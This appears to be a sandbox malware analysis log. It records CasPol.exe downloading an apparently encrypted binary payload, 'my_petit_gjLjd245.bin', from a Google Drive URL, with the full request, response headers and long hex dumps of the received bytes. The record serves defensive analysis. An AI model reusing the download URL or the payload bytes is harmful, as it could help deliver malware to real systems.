                                                                                                                          Date: Tue, 14 Jun 2022 11:50:16 GMT
                                                                                                                          Location: https://doc-0s-as-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/f8cjpnf3f7ipjgt74hjgn7nmh9mdv5ho/1655207400000/12280379857411278905/*/1JLP2zwq8GeTYGZF2eKMhocl6mu6XFy1T?e=download
                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                          Content-Security-Policy: script-src 'nonce-pqt98PSHX5s-fmLp-lMl2Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                          Server: ESF
                                                                                                                          Content-Length: 0
                                                                                                                          X-XSS-Protection: 0
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                          Connection: close


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          1192.168.11.2049747142.251.39.97443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          2022-06-14 11:50:17 UTC1OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/f8cjpnf3f7ipjgt74hjgn7nmh9mdv5ho/1655207400000/12280379857411278905/*/1JLP2zwq8GeTYGZF2eKMhocl6mu6XFy1T?e=download HTTP/1.1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Host: doc-0s-as-docs.googleusercontent.com
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2022-06-14 11:50:17 UTC1INHTTP/1.1 200 OK
                                                                                                                          X-GUploader-UploadID: ADPycdv94l6XQRneNKifnRpo8q5qw3-G-snpjc_a_ipM5p8ZojZ7YuRn61m_t01eXYliAgB8igRjPZ0yyww2wF_vkUHH5aeO30Zt
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Access-Control-Allow-Credentials: false
                                                                                                                          Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment
                                                                                                                          Access-Control-Allow-Methods: GET,OPTIONS
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Content-Disposition: attachment;filename="my_petit_gjLjd245.bin";filename*=UTF-8''my_petit_gjLjd245.bin
                                                                                                                          Content-Length: 215104
                                                                                                                          Date: Tue, 14 Jun 2022 11:50:17 GMT
                                                                                                                          Expires: Tue, 14 Jun 2022 11:50:17 GMT
                                                                                                                          Cache-Control: private, max-age=0
                                                                                                                          X-Goog-Hash: crc32c=6p3jpw==
                                                                                                                          Server: UploadServer
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                          Connection: close
                                                                                                                          2022-06-14 11:50:17 UTC5INData Raw: 51 3c f1 cc 32 d1 59 a9 41 d4 40 ae 5c 23 49 c3 bc b3 6c 5f 81 61 86 d6 67 0c fa 0a 10 be 7e 54 9e c5 3e 8d 34 d1 d4 0f be c1 af dd 36 8d 82 38 c8 00 0d 18 ff 84 60 e1 a0 da 54 f9 e6 5f b0 52 27 f4 77 bd 51 e7 0a f3 9d cf 85 96 06 19 16 9e c5 a0 6f cf 0e 39 61 a1 8b 9e e0 ef 7a a0 20 1e 59 8c 42 64 d3 cf 07 e2 51 5f bf b1 5b df 6e 3d 50 cc e4 a5 db f7 09 46 0a 4a 58 db 7a ec 66 27 52 6b 18 2c 16 cc 3f 0e 13 6d 54 31 5a 26 1f 32 bd 0c be 7a b6 0c 5d 89 0b a0 6c 19 ac 1a e9 0e 65 17 49 68 9f 54 ec 4e 4e ac 3a 19 f9 d7 63 41 0a 30 15 80 3c c4 e6 03 46 1f cb 29 c4 f0 6f 87 85 ac ca eb db 6d df b3 34 ca 3e 6d 34 5b 81 78 30 25 f3 89 ca 0d a7 0f cb 37 5a bb f1 40 12 16 93 eb f9 27 42 14 d3 51 20 5f 19 28 80 8c 14 6f b2 49 45 dd 3f ec ca d4 a2 2f 7f f7 40 db 79
                                                                                                                          Data Ascii: Q<2YA@\#Il_ag~T>468`T_R'wQo9az YBdQ_[n=PFJXzf'Rk,?mT1Z&2z]leIhTNN:cA0<F)om4>m4[x0%7Z@'BQ _(oIE?/@y
                                                                                                                          2022-06-14 11:50:17 UTC9INData Raw: 95 5d ff 36 cd e8 db 8d 88 39 99 fc 43 2f a8 7e a1 e2 3a 5a c5 4d 32 5c 5b fa e4 fc 2f 4f 68 ea 89 f9 77 b2 1c e3 9d 9b 67 73 b1 a6 25 ea b6 ca 68 47 23 40 b8 b8 8f 71 4c 12 75 1b ff 86 19 d1 37 c1 16 42 3f 30 ce f4 65 55 df c9 48 c8 f4 84 10 49 a7 fe 04 47 e2 1a 6d 8e b6 fb 36 97 6e 33 bd 7c 50 e0 a1 dc e2 c6 f9 1f 2f ec 2a 74 45 2d 93 23 3d 97 ac 10 0b 97 9d 19 1e 8f 6c e9 12 ba e2 99 a5 f1 48 55 73 cd d6 67 bd b4 b9 14 c2 7f 03 70 9e 7a b4 ed f0 ce 5f 3c f3 34 87 5b 5c 3b d0 2b d9 38 71 98 94 93 7e 20 35 94 40 14 c2 10 68 e0 30 30 ef 33 34 5d 18 39 af 78 8b 4e 5f 18 e6 e8 90 7f b3 0f 13 b7 8a d2 44 c6 15 e5 ed 9d 28 f8 15 66 7d e8 eb a6 b5 fb 88 36 86 9c ab d9 7f d6 02 ed 2c 6d 00 51 aa 10 15 94 af cb bf 4a ec 0a f4 86 c6 7b 97 d5 ef 10 f1 29 a0 6f c5
                                                                                                                          Data Ascii: ]69C/~:ZM2\[/Ohwgs%hG#@qLu7B?0eUHIGm6n3|P/*tE-#=lHUsgpz_<4[\;+8q~ 5@h0034]9xN_D(f}6,mQJ{)o
                                                                                                                          2022-06-14 11:50:17 UTC13INData Raw: cb fc c0 d2 ac 81 c4 67 9a 69 b5 2e 99 26 5c 62 6a 5c 95 b8 49 e5 55 ee e5 ab c3 85 de e1 ff a0 6f 3c d2 8a 8c 66 2d 25 9f c0 56 5a fb b9 11 39 56 c7 9e 48 09 36 ac 9d 26 4f 6b e6 a4 dc 06 c7 04 cb f0 43 ac 3b 68 bf f1 7b 59 22 5f e7 38 8f ed ed 3e fe d0 e0 40 96 6e d0 d8 7a 0f 3b 97 d4 f3 98 d9 90 79 18 2d f3 6e fb e2 88 88 b5 ef dc 45 c6 54 74 5e 05 7b 92 05 55 5c 40 46 38 a8 b2 55 07 89 cf db 37 55 4e 4f 21 e4 1b 35 12 c2 4c 47 f2 fc e6 e4 05 c5 26 32 35 cd aa 8e 19 1b 85 83 73 f6 f8 5c 4b b1 42 90 47 9e 95 57 dd 05 c9 87 b8 a5 c3 33 8d e5 41 2c a1 39 be e0 3a 56 fe 08 23 55 3e a4 94 fe 25 5a 4f b5 86 8a 0a 9a 6f eb 8e 90 5e 55 de de 23 c2 c8 db 66 9f 39 4d 90 95 89 af 26 29 48 0a f6 a0 15 dd b3 b6 6d 42 3e 36 d2 f1 12 60 f1 c9 4c 60 22 86 2c 2f ad 22
                                                                                                                          Data Ascii: gi.&\bj\IUo<f-%VZ9VH6&OkC;h{Y"_8>@nz;y-nETt^{U\@F8U7UNO!5LG&25s\KBGW3A,9:V#U>%ZOo^U#f9M&)HmB>6`L`",/"
                                                                                                                          2022-06-14 11:50:17 UTC17INData Raw: 7a 2e 6c 30 5f 75 11 a9 47 46 3a f6 62 4e c5 51 ff 53 aa db 91 26 80 b8 9c 4a 45 bb 8f 8b df 79 e9 15 96 ee 9f 0e 77 e1 d8 0c 34 0a ce 8b 46 36 f5 98 67 71 66 71 06 0a 2f a9 c2 69 ef 61 78 79 d5 cc 9f 2a 81 60 ab 8b b8 d2 aa 81 b4 ec 0f 83 a4 a7 68 87 af 4d ad 97 35 06 68 d9 6c d1 c2 67 62 60 be 66 13 56 ef 41 42 6e 11 d4 98 af c3 28 48 1e bb 5e 90 b6 3a 97 85 a6 e4 fd 63 b5 6a c0 7b 3c 02 0d db 20 14 fa d1 fb d8 ac 75 5e a0 69 15 54 06 9e dd 7c de 56 88 20 27 82 f4 32 7c 59 8e 0a 8b 45 d6 9b 31 34 81 16 55 c0 d4 91 21 ad 8b d5 7d f5 3b b5 33 93 35 56 68 5c 48 9e f5 59 ee db 71 8a df d2 ad 00 f2 eb c9 cf 3e a9 aa a1 c8 f7 1b b7 d4 23 69 d6 b5 12 6e 70 d6 8a 39 18 0c ac 9c 43 34 69 9d 84 00 17 c5 2b 08 f5 cd 1d 7c 3f bf f1 7b 59 bc 5d e7 34 b1 d6 8f df fb
                                                                                                                          Data Ascii: z.l0_uGF:bNQS&JEyw4F6gqfq/iaxy*`hM5hlgb`fVABn(H^:cj{< u^iT|V '2|YE14U!};35Vh\HYq>#inp9C4i+|?{Y]4
                                                                                                                          2022-06-14 11:50:17 UTC17INData Raw: c0 36 40 b1 9e 92 11 16 99 cb 25 25 42 12 bc bc de 03 10 47 6e ac 14 65 a1 45 54 d1 2b c4 57 d6 a2 09 67 7a 47 d9 79 85 a7 83 b5 2a 81 ee d8 66 c2 cc 78 c4 15 88 c0 45 fd 91 a7 86 45 4b b1 7c 74 f1 5e da 50 a9 11 d5 b0 91 a9 8a d5 f6 98 a3 02 c9 0d 42 7c 39 eb 1f 4e 75 10 b0 5a 5f 3f c8 9a 93 c7 57 ee 7c bc ca 85 33 87 94 15 4e 53 99 4a a1 3f 7d 4b 02 85 77 8c 1a 5f 78 cb 1e 2f 30 14 a3 99 3e d9 9c ee 58 73 71 3a d0 05 31 c4 7f 68 4e 69 79 d4 d2 98 32 bf eb a0 9a be d2 aa 8e b4 ec 0f 8d a4 a7 68 87 af 4a ab 92 0f 88 40 06 64 f9 26 c5 73 78 81 82 e9 57 e5 7d 8e 80 fc 3f 8b af c3 63 4a 1e b7 60 ba b1 3a 9d 96 b9 d8 06 4b 2d 60 ec 6c 05 ea 1c df 1b 09 35 ca cd f4 90 79 76 f5 66 03 58 06 1e dd 7c de a0 2f 26 0d 88 e7 37 2c 55 e1 a0 8b 45 dc a1 db ca 7e e9 78
                                                                                                                          Data Ascii: 6@%%BGneET+WgzGy*fxEEK|t^PB|9NuZ_?W|3NSJ?}Kw_x/0>Xsq:1hNiy2hJ@d&sxW}?cJ`:K-`l5yvfX|/&7,UE~x
                                                                                                                          2022-06-14 11:50:17 UTC19INData Raw: f6 16 42 3f 9e d7 ed 0c 5e 53 98 4c 6a fd 31 29 33 bd e8 8e b4 ea 02 44 67 a7 f4 28 88 68 25 eb fa 50 e0 af d2 bf cc ed 3d 68 e6 33 5a 25 a2 94 25 9f 9e a2 7a 02 bf 05 1d bc 8d 03 e7 b0 b2 e5 ea 66 e0 59 5b fd c9 ef 20 c9 8d b3 3c 90 10 5e 7a b6 5e 68 ef eb 17 30 2b b2 28 81 48 54 39 d9 44 f4 38 71 9e e8 95 56 c6 48 96 46 05 aa 01 6c c8 0b 30 ef 38 0d 6d 1b 39 2d 64 8b 4e 4e 18 e6 f9 3f 74 8b b9 1a b5 8a d2 81 dc eb e4 d0 97 56 eb 15 66 79 fe cb a7 af f0 c8 31 9f 62 a2 f5 78 ef 35 e6 07 70 1a 5d bd e9 03 46 ac ff b6 52 e0 1c 0d 98 e3 87 81 f2 e6 11 86 83 a1 43 cd 25 3b 4a 42 c8 88 e3 61 cd 88 da 1e 59 86 6a 2d d1 cf 01 9c 63 5f bf bb 34 95 6e 3d 5a a3 37 a5 db fd 23 30 79 03 58 db fc c4 26 27 5c 72 b6 a2 26 78 36 c7 26 55 64 7d 97 03 5f da e6 7f 9e 0e ee
                                                                                                                          Data Ascii: B?^SLj1)3Dg(h%P=h3Z%%zfY[ <^z^h0+(HT9D8qVHFl08m9-dNN?tVfy1bx5p]FRC%;JBaYj-c_4n=Z7#0yX&'\r&x6&Ud}_
                                                                                                                          2022-06-14 11:50:17 UTC20INData Raw: 4e 47 82 31 9c 70 d5 66 f1 3e 99 63 46 9d ad 0b 7e 18 7a 2c 97 4c 34 96 b7 eb f3 55 13 43 49 31 ba 3d 8a fa af f0 e9 4f 8f 75 ce 7d 14 e9 12 d0 d4 1f 08 d9 d9 eb a9 3e 5e aa 6e 09 4c 2e 98 22 7d d4 8e a0 6a 0d 82 fe 90 22 49 82 0a 83 5a d8 65 30 18 8f 11 8e 8c d4 91 d8 2c b9 d5 6d f1 24 ba 22 93 3d 4d 8d 6d 61 88 d0 51 ee db 5d f4 c2 c3 85 d0 d8 c8 cf c5 36 52 89 a1 c8 f7 28 82 d4 2b 75 05 b8 3c 17 4d da 8a 35 2f 27 52 9d 65 10 40 e3 96 79 e9 3e fc f7 f7 de 2b 57 1c c5 f1 71 71 b6 5d e7 2f 8a e5 c4 5c fb d3 ee 44 b7 d2 2e d9 5c 00 0b cb d4 fa 8b 2e fe 07 1c 06 a2 67 f2 f3 87 81 4f f8 e1 4f 5e 9d 3c 2a 05 7f 16 a3 44 82 5a 49 af 12 dd 28 1c 77 c4 df 90 42 64 59 04 45 10 2f ea c5 48 fb 8e d1 e0 cc 27 aa 23 39 5a 95 d4 a9 13 08 86 95 ef 88 3e 4a 5a bc e0 31
                                                                                                                          Data Ascii: NG1pf>cF~z,L4UCI1=Ou}>^nL."}j"IZe0,m$"=MmaQ]6R(+u<M5/'Re@y>+Wqq]/\D.\.gOO^<*DZI(wBdYE/H'#9Z>JZ1
                                                                                                                          2022-06-14 11:50:17 UTC21INData Raw: 06 b7 e7 e3 bd 52 e5 15 d1 aa d6 fb 9f f9 e6 12 b6 6e a2 6f c9 26 1a 61 a1 c1 1e e9 ef 7a a4 fd 35 5d 8c 42 66 cc ee 34 fb 2f 56 bf b1 5f f7 7a 3f 50 ca cc 86 db f7 03 c6 03 4a 58 df 27 e1 62 27 5c 76 bd 2f 25 55 48 ca 32 d5 51 55 82 05 4b 5c fc 5c 9e 0a ce e3 33 fb 6a c9 32 73 cd 74 83 1f 0c 37 2b 09 97 05 99 20 64 45 5d 39 bd 9c ed ba 64 5f 71 e7 0d b9 d8 10 1c 16 cb 29 c0 d8 79 85 d5 ef e2 c8 97 6c d6 33 a8 03 98 0b e9 e6 82 78 30 27 ec f8 19 14 db 07 c0 36 55 93 e6 7c 11 10 bb c0 f9 27 48 94 da 51 de 07 c7 b7 83 ac 14 6d ad 3b 76 c4 41 e5 8a d4 a6 27 67 f5 40 df 51 a7 b4 92 ae bb 9e c6 87 60 1f 4b d9 d5 04 9d f7 cc cf 88 df 2d 54 5a a1 40 79 db c6 dc 78 80 39 c4 ba 11 aa 99 d9 e3 49 d4 29 17 0f 40 65 5a 55 01 30 7c 11 a3 4f 66 34 dc b2 4a ed 74 e8 de
                                                                                                                          Data Ascii: Rno&az5]Bf4/V_z?PJX'b'\v/%UH2QUK\\3j2st7+ dE]9d_q)yl3x0'6U|'HQm;vA'g@Q`K-TZ@yx9I)@eZU0|Of4Jt
                                                                                                                          2022-06-14 11:50:17 UTC22INData Raw: fd a0 b3 44 be c3 ad e3 70 02 17 c4 aa e2 93 d0 f5 56 24 2d f9 79 d5 a9 f0 aa b1 f9 c9 43 60 f1 1a 2a 0f 0f 8b 14 53 5a d6 71 b6 1f d9 0b 5d f7 f6 f3 94 51 4c 6d 1a 44 19 3f 60 d7 64 e1 f2 7c d3 cc 23 c1 0c 62 24 ab aa 8e 17 0a aa 80 74 e7 f5 3e 4e b6 cc 25 a8 de 95 57 d3 3e 95 96 e9 a5 c3 3d 9b de 5b 3c a9 5c bf f4 3a 5c ef 81 06 5c 51 d6 be fe 2f 5a 70 a0 89 4e 7c 9a 6f d4 9d 9d 5e 4e a2 a1 1b 55 c3 c8 68 41 1a 6f a4 46 88 83 25 44 6b 1b ff 88 12 d1 a9 de 16 53 39 27 38 e3 37 50 d7 e9 48 6b fc 93 10 2c a4 fe 08 cd fe 03 45 cf 8f 41 3c 9c 7c 2e d0 61 50 f1 a2 ee 50 c7 d5 00 85 c4 33 5d 33 2f bb 35 9e 9f bc 46 02 96 9d 17 91 3a 6c f8 b7 b2 ef e0 a1 0f 49 7d d4 c1 f2 30 ae b3 b3 2d 96 67 fd 7b 9a 5e b7 fb ba 22 5e 16 b2 31 94 5c 5c 2a d7 34 c5 c6 70 b4 f0
                                                                                                                          Data Ascii: DpV$-yC`*SZq]QLmD?`d|#b$t>N%W>=[<\:\\Q/ZpN|o^NUhAoF%DkS9'87PHk,EA<|.aPP3]3/5F:lI}0-g{^"^1\\*4p
                                                                                                                          2022-06-14 11:50:17 UTC24INData Raw: d8 2b 31 2a 80 aa 3c 43 b0 49 43 b2 75 ec 8a de a8 12 73 f7 48 c3 87 85 98 81 a2 13 b0 c4 87 62 ea e2 d8 d5 02 f0 a2 bf fc 9b ab 3f 58 5a ad 77 6f 27 c7 f6 57 a4 23 c2 12 8e b3 95 d9 ef 82 49 2b 3b 0d 55 76 2e 6e 07 5c 8b 10 8f 49 65 2b e6 c2 b2 3a a8 c2 bc af d9 ea 6f 93 bc 89 4d 7b 81 5f 89 d5 0b 53 04 92 f8 f6 52 5f 79 dc 26 5c 20 00 f0 0e 3c d9 9e 4f 61 72 64 2e ce 59 b1 c4 7f 60 1b 30 79 d4 dc a1 74 ab d0 b4 8a b2 cc 80 20 96 ed 09 9f 46 81 69 87 a4 73 f3 81 1f f1 4a d8 66 f3 08 02 62 6a 90 d7 5a 56 e5 7f 06 df ec 44 bd ba eb f1 48 65 f4 48 1d b5 12 f1 84 b2 f6 cf 61 3e 5a c4 71 51 e0 0d db 10 1e 24 d0 c8 fc b9 4d 5f aa 64 03 56 31 bc 23 7d f8 a9 8a 5d 44 82 f4 36 3e 6d ad 0b 8b 4f d5 b3 15 35 81 1c a5 e9 f1 90 d2 a6 a3 b2 6d f5 3d 93 31 9e 39 57 7b
                                                                                                                          Data Ascii: +1*<CICusHb?XZwo'W#I+;Uv.n\Ie+:oM{_SR_y&\ <Oard.Y`0yt FisJfbjZVDHeHa>ZqQ$M_dV1#}]D6>mO5m=19W{
                                                                                                                          2022-06-14 11:50:17 UTC25INData Raw: 38 b3 6e 2e c5 e3 14 df ed a7 fb 3c 96 ac 2a c3 66 51 c8 b1 f4 ae cc d1 b5 8d e4 39 28 2b 2f 93 24 61 94 b6 6e 3e 30 9d 1d b6 8d a9 8f a1 b4 e9 bf ae e2 4e 14 d4 c5 fe 2a bd b4 b3 3c f5 80 fc 85 ca ab 4b 12 7e ef a0 e9 6c d7 78 a4 82 0c c1 2c da 3e 60 9d be 93 7e 20 4a 96 40 14 a2 db 97 1f d2 ee cd 47 3a 6d 1b 38 78 86 88 5f 49 0e 18 fa d9 65 8d af ed b6 d5 2c 52 aa f6 e4 c1 96 7e c6 15 66 73 20 11 b7 9f f0 82 b1 b7 50 ab f5 72 84 25 fc 2a 47 1f 72 84 17 02 60 84 e7 bc 42 e7 0a f2 99 cf 85 25 30 e6 1a 2d 7d a0 6f d4 3e 3d 61 c3 cb 9e e0 ae 7a a0 31 36 5d 8c 42 62 bc fa 06 e2 5b 5d 97 87 5a df 64 52 67 cd e4 af cc 7a 53 46 0a 4b 55 d2 ec f3 6b ba 55 1b 9a 23 16 72 3d c0 24 e4 5d 7a 94 10 91 c0 de a1 b2 09 d2 4c 36 fc 6d 43 fb 79 1b 63 5d fb 1b e9 37 25 45
                                                                                                                          Data Ascii: 8n.<*fQ9(+/$an>0N*<K~lx,>`~ J@G:m8x_Ie,R~fs Pr%*Gr`B%0-}o>=az16]Bb[]ZdRgzSFKUkU#r=$]zL6mCyc]7%E
                                                                                                                          2022-06-14 11:50:17 UTC26INData Raw: 57 c9 67 2e 97 c6 c8 9f bb e1 ea 4f 36 ac 48 1d bb 12 93 84 b2 db 86 0d 2c 6a ca 6e 1b f2 06 db 3b 15 3b ca 20 f1 ad 64 58 bd e8 52 5e 2e b1 f5 84 d4 88 82 2c 12 8e e7 39 3d 54 85 1d 75 44 fa 98 29 27 8a 16 b7 ca c8 6f d3 80 b1 d2 79 dd d9 b7 2e 95 22 da 74 6c 4d 9f bd 5f ff dc 4f 83 f7 d2 85 d4 fa 49 de c2 2f da 91 a9 dc e7 24 03 86 23 63 fa aa 19 04 53 c0 9d a1 21 3f bb b4 d5 12 6b ec 88 1d 04 ca 03 cc fc d2 16 aa 1d 93 ec 73 60 83 75 04 3e 9c e2 fe 3d d3 30 ee 44 b4 aa 93 d9 70 08 7c 80 d5 f3 98 cf f1 38 13 2d e8 76 e6 0d 8f b5 be fb a2 06 49 e3 11 a6 54 7b 98 15 59 42 45 49 b6 0e d6 3c f9 88 e9 ff 85 5c 58 d5 30 18 e7 ca eb da 77 ea f0 ed eb da dd c4 0a 3b 4d 8c a1 8e 02 03 9d 82 8b e6 d3 48 71 b3 f4 d8 d5 15 6a 55 fd 14 dc d8 df a5 43 39 99 f6 0d 3d
                                                                                                                          Data Ascii: Wg.O6H,jn;; dXR^.,9=TuD)'oy."tlM_OI/$#cS!?ks`u>=0Dp|8-vIT{YBEI<\X0w;MHqjUC9=
                                                                                                                          2022-06-14 11:50:17 UTC28INData Raw: 15 7d a0 69 c3 14 34 61 a8 d3 60 e1 c3 72 d3 9d 1e 59 86 49 7d de cf 0e f5 af 5e 93 b3 43 d2 6e 34 46 32 e5 89 d9 e0 04 46 03 50 a6 da d6 ee 4d 25 77 ca aa 08 05 48 35 c3 ad d5 55 7d dd 07 4b 4b c2 72 a6 9b c4 63 3a fb 63 d6 b2 7b e1 79 8f 1f 23 37 2b 07 c2 69 99 20 6a d9 59 39 b4 84 ce 60 4b 5b 5a a0 0f c4 eb 00 78 e1 ca 05 ce f3 47 66 d5 e9 c0 c7 8c 77 d1 b3 a8 1a 66 0e 18 50 86 7b 26 0d 78 89 2a 0b a9 14 cd 36 58 a6 0f 7f 3d 1f 9b e0 84 68 42 14 d7 4f d3 03 13 3f 7e ad 38 6d aa 44 45 d4 21 12 8b f8 a8 07 7d 8a 0d d9 79 80 ab 9b a9 3b 9e de 79 65 ee c1 d8 cd 1d ec d4 be fc 9b aa 3d 59 5a ac 7e 9e d8 ea d8 47 ae 39 cd af 98 5d 98 f5 e5 bf b2 12 7d f0 bd 85 26 4c 18 5d 45 13 a3 e7 4e 2e de f9 4c c5 46 fe d2 95 45 91 27 93 bc 85 53 ad 92 72 80 d8 7d 36 4a
                                                                                                                          Data Ascii: }i4a`rYI}^Cn4F2FPM%wH5U}KKrc:c{y#7+i jY9`K[ZxGfwfP{&x*6X=hBO?~8mDE!}y;ye=YZ~G9]}&L]EN.LFE'Sr}6J
                                                                                                                          2022-06-14 11:50:17 UTC29INData Raw: f7 3a 1c 13 83 7d ff f3 91 97 a2 fc cd 50 4d fc 08 d4 04 57 97 16 28 0b 56 42 b2 25 0e 20 07 89 da e7 87 50 4e 54 0c 5a 15 cb 15 e8 6c e9 e7 2a ec d3 2e d6 23 38 4b 9a b2 70 12 24 8d 90 0e b5 ff 4a 5e a1 f7 12 29 ea 95 4e c4 11 cf f9 d8 ba d2 c7 98 da 58 3f ae 38 4e e6 54 d9 82 9c 32 5c 57 cd 86 ed 2a 49 51 a1 96 ef 83 9b 43 ea 9f 89 32 16 b1 a6 27 dd d5 db 6d 41 1a 6d a7 b1 77 ae 00 2a 5a 60 b1 8c 1f c8 d5 86 17 42 34 31 d9 e8 08 4d df d8 49 75 e9 6d 39 10 aa fc 79 ab ea 02 41 aa 28 fb 3c 96 63 24 d0 63 50 f1 a0 ee 50 c7 d5 10 9b ef 28 4f 36 2f 82 20 80 8b 48 6f 3a 98 9f 66 f2 87 77 ef df c8 fe e7 b2 ee 5d 42 d4 c5 ef 2f a6 4a b2 10 9a 7d 78 2a b6 54 b0 c1 cf 0c 4c 13 b2 39 82 44 4c c5 d1 07 c0 00 ff 98 fb 91 61 31 59 93 40 05 a7 0f 66 1e 2c 1c e0 30 5c
                                                                                                                          Data Ascii: :}PMW(VB% PNTZl*.#8Kp$J^)NX?8NT2\W*IQC2'mAmw*Z`B41MIum9yA(<c$cPP(O6/ Ho:fw]B/J}x*TL9DLa1Y@f,0\
                                                                                                                          2022-06-14 11:50:17 UTC30INData Raw: a5 17 81 f6 6c db 52 86 9f 71 a6 38 93 a9 11 64 c2 cc f0 d5 04 8c d8 ba fc 76 a1 24 54 0f a5 68 71 dd a9 ab 51 a3 33 e9 bb b9 50 9b d9 e1 e7 eb 2b 17 05 38 60 a3 49 18 4e 74 02 a7 49 35 60 de b2 48 c6 2c b5 de ad df 87 48 e1 bd 8d 44 75 91 25 c7 df 7f 4f 15 96 ec 91 75 62 78 d8 06 18 33 06 9d 6e 57 d8 9a 46 27 41 35 65 c7 29 c3 ea 7d 74 4c 7b 02 8d d8 8b 3a bf cb a2 89 c9 88 82 53 b2 e1 22 8e 2a db 31 87 ae 5d a7 b0 0d 9c 13 97 66 f9 24 71 75 19 e5 ab 13 5c e8 50 2e 87 c4 0b 60 44 eb fb c7 31 bd 48 1c bb 38 ec ca b2 f0 ed 48 56 34 c0 71 10 f7 62 a9 2b 1e 2e e7 dd 8b da 75 5e ae 6f 28 78 27 b6 cb 7b d2 06 3f 4c 25 f6 f5 32 37 f2 e1 37 8a 45 dc 88 34 30 87 00 b7 c4 bb e5 d2 ac 81 d2 7c f0 83 db f4 98 32 41 19 5c 98 9a c1 22 ee db 53 89 a4 9a 85 d4 f4 f5 fc
